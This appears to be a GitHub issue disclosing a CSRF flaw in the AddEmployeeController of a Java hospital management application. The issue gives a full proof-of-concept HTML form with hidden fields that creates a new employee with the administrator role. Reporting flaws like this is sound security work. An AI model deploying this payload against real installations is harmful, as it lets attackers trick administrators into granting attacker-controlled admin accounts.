There is a csrf vulnerability in src/main/java/com/project/controller/administrator/AddEmployeeController.java. #28
Description
csrf payload:
csrf test!
<form action="http://10.25.10.161:8080/HospitalManagement_war_exploded/addEmployee.html" method="POST">
<input name="firstName" value="test" type="hidden"/>
<input name="middleName" value="test" type="hidden"/>
<input name="lastName" value="test" type="hidden"/>
<input name="birthdate" value="1994-06-08" type="hidden"/>
<input name="gender" value="female" type="hidden"/>
<input name="email" value="123123123%40qq.com" type="hidden"/>
<input name="mobileNo" value="111111111" type="hidden"/>
<input name="adharNo" value="11111111" type="hidden"/>
<input name="country" value="test" type="hidden"/>
<input name="state" value="test" type="hidden"/>
<input name="city" value="test" type="hidden"/>
<input name="residentialAddress" value="test" type="hidden"/>
<input name="permanentAddress" value="test" type="hidden"/>
<input name="role" value="administrator" type="hidden"/>
<input name="qualification" value="test" type="hidden"/>
<input name="specialization" value="test" type="hidden"/>
<input type="submit" value="click me!"/>
</form>
</body>
Due to the backend not checking the Referer of the request and not using CSRF tokens to prevent CSRF vulnerabilities, it is possible to induce administrators to perform high-privileged operations.
